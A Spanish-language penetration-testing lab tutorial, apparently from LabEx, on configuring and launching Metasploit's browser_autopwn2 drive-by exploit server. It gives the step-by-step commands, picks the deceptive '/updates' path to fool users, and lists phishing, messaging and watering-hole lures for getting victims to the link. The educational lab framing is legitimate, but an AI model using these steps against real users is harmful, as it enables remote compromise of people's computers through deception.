Configurar un Ataque de Browser Autopwn en Metasploit

Kali LinuxBeginner
Practicar Ahora

Introducción

En este laboratorio, profundizaremos en una de las potentes características del Metasploit Framework: el ataque browser autopwn. Este tipo de ataque consiste en configurar un servidor web malicioso que, al ser visitado por un objetivo, detecta automáticamente el tipo y la versión del navegador de la víctima, y luego sirve un exploit adaptado a cualquier vulnerabilidad descubierta.

Utilizaremos el módulo auxiliary/server/browser_autopwn2, una versión actualizada y más fiable del browser autopwn original. Este laboratorio le guiará a través del proceso de selección del módulo, configuración de las opciones necesarias y lanzamiento del servidor.

Descargo de responsabilidad: Este laboratorio es únicamente para fines educativos. Las técnicas descritas solo deben realizarse en sistemas que usted posea o para los que tenga permiso explícito para probar.

Seleccionar el módulo auxiliary/server/browser_autopwn2

En este paso, iniciaremos la consola del Metasploit Framework y seleccionaremos el módulo browser_autopwn2, que será el núcleo de la configuración de nuestro ataque.

Primero, abra una terminal y lance la consola de Metasploit. Usaremos la bandera -q para un inicio "silencioso" (quiet), que suprime el banner para una interfaz más limpia.

msfconsole -q

Una vez cargada la consola, verá el prompt de Metasploit, que se ve como msf6 >. Metasploit organiza sus herramientas en módulos. Para configurar nuestro ataque, necesitamos usar el módulo auxiliar browser_autopwn2. Use el comando use para seleccionarlo.

use auxiliary/server/browser_autopwn2

Después de ejecutar el comando, su prompt cambiará para indicar que ahora está en el contexto de este módulo específico.

msf6 > use auxiliary/server/browser_autopwn2
msf6 auxiliary(server/browser_autopwn2) >

Ahora está listo para configurar las opciones del módulo.

Establecer la opción LHOST a su IP de Kali

En este paso, configurará la opción LHOST. LHOST significa "Local Host" (Host Local) y debe establecerse a la dirección IP de su máquina atacante (la VM de LabEx). Cuando un exploit tenga éxito, la máquina de la víctima se conectará a esta dirección IP, dándole el control.

Primero, necesita encontrar la dirección IP de su VM de LabEx. Puede abrir una nueva pestaña de terminal haciendo clic en el icono + en la ventana de la terminal. En la nueva terminal, ejecute el siguiente comando para mostrar su dirección IP:

ip addr show eth0 | grep "inet " | awk '{print $2}' | cut -d/ -f1

Verá una salida similar a esta. Asegúrese de copiar su dirección IP específica.

10.0.2.15

Ahora, regrese a su terminal original donde se está ejecutando msfconsole. Para ver todas las opciones configurables para el módulo browser_autopwn2, use el comando show options.

show options

Verá una lista de opciones. Observe que LHOST es requerido pero aún no está establecido. Use el comando set para configurar LHOST con la dirección IP que acaba de copiar. Reemplace YOUR_IP_ADDRESS con su IP real.

set LHOST YOUR_IP_ADDRESS

Por ejemplo, si su IP fuera 10.0.2.15, el comando sería:

set LHOST 10.0.2.15

Metasploit confirmará el cambio.

LHOST => 10.0.2.15

El LHOST ahora está configurado correctamente.

Establecer el URIPATH para el servidor malicioso

En este paso, establecerá el URIPATH. Esta opción define la ruta específica en su servidor web que la víctima debe visitar para activar el ataque. Usar una ruta discreta y no predeterminada puede hacer que el ataque sea menos obvio.

Al igual que en el paso anterior, puede usar show options para revisar la configuración actual. Verá que URIPATH tiene un valor predeterminado, pero lo cambiaremos a algo personalizado.

Establezcamos la ruta a /updates. Esto podría engañar a un usuario haciéndole pensar que está visitando una página de actualización de software. Use el comando set para cambiar el URIPATH.

set URIPATH /updates

La consola confirmará que el URIPATH ha sido actualizado.

URIPATH => /updates

Ahora, la URL maliciosa que una víctima necesitaría visitar será http://<YOUR_IP_ADDRESS>:8080/updates.

Ejecutar el módulo para iniciar el servidor web

En este paso, con todas las opciones necesarias configuradas, lanzará el módulo auxiliar. Esto iniciará un servidor web en su máquina que escuchará las conexiones entrantes de posibles víctimas.

Para iniciar el módulo, simplemente escriba run en el prompt de msfconsole y presione Enter.

run

Metasploit ahora iniciará el servidor y cargará todos los exploits de navegador relevantes. Verá mucha salida mientras el servidor se inicializa. La información clave que debe buscar es la confirmación de que el servidor se ha iniciado y la URL que está utilizando.

La salida se verá algo así (algunos detalles pueden variar):

[*] Auxiliary module running as a background job 0.
[*] Using URL: http://10.0.2.15:8080/updates
[*] Server started.
[*] Starting the payload handler...
[*] Analyzing browser info and matching exploits...
[*] Added exploit/windows/browser/adobe_flash_avm2...
[*] Added exploit/windows/browser/adobe_flash_copy_pixels...
... (se listarán muchos más exploits) ...

Su servidor malicioso ahora está en funcionamiento y esperando activamente que un navegador web se conecte a http://10.0.2.15:8080/updates (con su IP real). Cuando un navegador se conecte, el servidor lo analizará e intentará lanzar un exploit adecuado.

Discutir cómo atraer a un objetivo a la URL maliciosa

En este paso final, discutiremos la parte más crítica de este ataque: conseguir que un objetivo visite la URL maliciosa. El servidor está en funcionamiento, pero es pasivo; no puede hacer nada hasta que una víctima navegue hasta el enlace. Esta fase depende en gran medida de la ingeniería social.

Dado que este entorno de laboratorio no incluye una "máquina víctima" separada, este paso es puramente conceptual. No hay comandos que ejecutar.

Aquí hay algunos métodos comunes utilizados para entregar el enlace malicioso (http://YOUR_IP_ADDRESS:8080/updates) a un objetivo:

  • Correos electrónicos de phishing: Envío de un correo electrónico engañoso que anima al usuario a hacer clic en el enlace. Por ejemplo, el correo electrónico podría hacerse pasar por una alerta de seguridad, una oferta especial o una notificación de restablecimiento de contraseña.
  • Mensajería instantánea: Envío del enlace directamente a un objetivo a través de una aplicación de chat, a menudo con un mensaje como "¡Oye, mira este sitio genial!".
  • Redes sociales: Publicación del enlace en una plataforma de redes sociales, ya sea públicamente o en un mensaje directo, para tentar a hacer clic.
  • Ataque de "Watering Hole": Una técnica más avanzada en la que un atacante compromete un sitio web legítimo que se sabe que el objetivo frecuenta. El atacante luego incrusta el enlace malicioso o una redirección en ese sitio.

Si un objetivo con un navegador vulnerable visita su URL, browser_autopwn2 servirá automáticamente el exploit apropiado. Si el exploit tiene éxito, se abrirá una "sesión" en su consola de Metasploit, lo que le dará acceso remoto a la máquina de la víctima. Vería un mensaje como [*] Session 1 opened... en su terminal.

Resumen

¡Felicitaciones por completar este laboratorio! Ha aprendido con éxito los pasos fundamentales para configurar un ataque de "browser autopwn" utilizando el Metasploit Framework.

En este laboratorio, usted ha:

  • Iniciado la consola de Metasploit.
  • Seleccionado el módulo auxiliary/server/browser_autopwn2.
  • Configurado las opciones esenciales LHOST y URIPATH.
  • Iniciado el servidor web malicioso y comprendido su función.
  • Discutido las técnicas de ingeniería social necesarias para atraer a un objetivo a la URL maliciosa.

Este ejercicio demuestra cuán potentes y automatizadas pueden ser las herramientas de pruebas de penetración. También resalta la importancia crítica de mantener los navegadores web y sus complementos actualizados para defenderse contra tales ataques. Recuerde siempre utilizar este conocimiento de manera responsable y ética.